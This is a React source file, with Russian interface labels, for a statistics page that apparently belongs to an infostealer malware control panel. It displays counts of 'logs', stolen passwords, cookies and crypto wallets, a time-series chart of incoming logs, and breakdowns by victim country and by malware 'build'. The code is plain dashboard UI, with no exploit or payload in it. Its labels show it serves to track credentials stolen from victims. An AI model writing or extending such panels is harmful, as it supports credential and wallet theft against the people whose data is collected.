import React, { useEffect, useMemo, useState } from 'react';
import api, { cacheGet, cacheSet } from '../api';

function LineChart({ series }) {
  const pts = useMemo(() => {
    if (!series?.length) return '';
    const w = 640, h = 220, pad = 24;
    const max = Math.max(...series.map((s) => s.logs || 0), 1);
    return series.map((s, i) => {
      const x = pad + (i * (w - pad * 2)) / Math.max(series.length - 1, 1);
      const y = h - pad - ((s.logs || 0) / max) * (h - pad * 2);
      return `${x},${y}`;
    }).join(' ');
  }, [series]);
  if (!series?.length) return <div className="rm-empty">Нет данных</div>;
  return (
    <svg viewBox="0 0 640 240" width="100%" height="240">
      <polyline fill="none" stroke="#06B6D4" strokeWidth="3" points={pts} />
    </svg>
  );
}

export default function Stats() {
  const [stats, setStats] = useState(() => cacheGet('stats', null));

  useEffect(() => {
    api
      .get('/stats')
      .then((r) => {
        const next = r.data && typeof r.data === 'object' ? r.data : {};
        setStats(next);
        cacheSet('stats', next);
      })
      .catch(() => setStats((prev) => prev || cacheGet('stats', {})));
  }, []);

  if (!stats) return <div className="rm-empty">Загрузка…</div>;

  return (
    <div>
      <div className="rm-page-title">Статистика</div>
      <div className="rm-kpi-grid">
        <div className="rm-card rm-kpi">
          <div className="label">ЛОГИ</div>
          <div className="value">{(stats.total_logs || 0).toLocaleString('ru-RU')}</div>
        </div>
        <div className="rm-card rm-kpi">
          <div className="label">ПАРОЛИ</div>
          <div className="value">{(stats.passwords || 0).toLocaleString('ru-RU')}</div>
        </div>
        <div className="rm-card rm-kpi">
          <div className="label">КУКИ / КОШЕЛЬКИ</div>
          <div className="value">{(stats.cookies || 0)} / {stats.wallets || 0}</div>
        </div>
      </div>

      <div className="rm-charts">
        <div className="rm-card rm-chart-card">
          <h3>Динамика логов</h3>
          <LineChart series={stats.series || []} />
        </div>
        <div className="rm-card rm-chart-card">
          <h3>По странам</h3>
          <div style={{ display: 'flex', flexDirection: 'column', gap: 8 }}>
            {(stats.by_country || []).slice(0, 10).map((c) => (
              <div key={c.country_code || c.country} style={{ display: 'flex', justifyContent: 'space-between', fontSize: 13 }}>
                <span>{c.country_code || c.country || '??'}</span>
                <b>{c.count}</b>
              </div>
            ))}
            {!stats.by_country?.length && <div className="rm-empty">Пусто</div>}
          </div>
        </div>
      </div>

      <div className="rm-card" style={{ marginTop: 16, padding: 16 }}>
        <h3 style={{ marginBottom: 10 }}>По билдам</h3>
        <div className="rm-tags">
          {(stats.by_build || []).map((b) => (
            <span className="rm-tag" key={b.build_name}>{b.build_name || '—'}: {b.count}</span>
          ))}
        </div>
      </div>
    </div>
  );
}
